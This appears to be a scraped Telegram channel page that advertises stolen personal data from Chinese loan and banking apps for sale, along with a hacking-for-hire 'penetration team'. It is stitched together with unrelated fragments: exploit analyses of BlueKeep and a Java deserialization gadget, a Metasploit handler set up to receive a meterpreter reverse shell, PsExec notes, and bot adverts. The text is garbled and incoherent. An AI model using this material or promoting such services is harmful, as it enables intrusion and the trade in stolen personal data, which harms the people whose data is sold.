Overseas and domestic data cracking
5.36K subscribers
148 photos
4 links
Consult: @comeblackgirl
The material for the IOU (loan-note) data costs about 80-90 yuan. The price is a bit high.
[New Inquiries Received]
China Merchants Bank Financial Services Inquiry Application (New)
Youqian Dan Inquiry Application (New)
Nan Yin Faba Inquiry Application
Ping An Loan Inquiry Application
Du Xiaoman Inquiry Application
360 Jiedian Inquiry Application

Output quantity: 500
Bulk orders accepted; results tested many times (5-12 conversions)
Output time: orders can be delivered on the same day they are placed, unless the target is a very small city
Penetration team available: intrusion, backend access, server modification, and similar work.
When you step in, you can see that, because the incoming cache flag is true, the mapping associates the com.sun.rowset.JdbcRowSetImpl class with the JdbcRowSetImpl object instance. OK, the analysis of A ends here.
Let's use the RASTAPI module to demonstrate exploitation of the vulnerability. The IKEEXT service uses this module, so we can trigger the event-log behavior by initiating any VPN connection. The default settings of the relevant registry keys are as follows:
Make search more efficient, make information more valuable.

Helps you find interesting groups, channels, videos, music, movies, and news.
Channel: @CJYQNEWS | Bot: @CJYQ
Click the button below to search.
ChaoSuo @ChaoSuoBOT

Easily find groups, channels, videos, music, movies, and news!

Click the button below to start searching.
Project Search @XMSSBOT is a Telegram project-matching platform that can find the projects, resources, contacts, information, and channels you are interested in.
After the vulnerability was disclosed, the proof of concept (PoC) was not released for a long time. The versions said to be successfully exploitable changed daily. Several version-related keywords circulated, including "51", "48", and "58", but it was unclear which was the actual version. Therefore, I decided to check the official announcements first. I found that only the announcement for version 49 mentioned "enhanced security protection". So I started searching versions 48 and 49 for commit logs, but I didn't find anything at that time.
The vulnerability trigger point is in termdd.sys. When the shellcode executes, the IRQL is DISPATCH_LEVEL, which requires special handling. BlueKeep uses the module's shellcode to implement logic that is basically the same as EternalBlue's: both first hook the syscall and then use APC injection to complete the transition from R0 to R3. There is one difference. BlueKeep uses the egg-hunter method to search for and copy the user-mode payload while the shellcode runs (because of the limited size of the data sent in a single virtual channel), whereas in EternalBlue the offset of the user-mode payload is fixed.
If the exploitation of the vulnerability is successful, the shellcode will be executed at the address termdd!IcaChannelInputInternal+17d.
Then copy it to the XP system and note its location, for example C:\s.dll.
Run msf on Kali with the following commands:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.232.134
LHOST => 192.168.232.134
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Using PsExec on a Single Remote Computer
To start using PsExec, simply close the existing PowerShell console and launch a new one. If you want to use it from the command prompt, start the command prompt instead. Just make sure to start an elevated session, since PsExec requires administrator permissions to run programs on remote computers. Non-administrators can also use PsExec locally.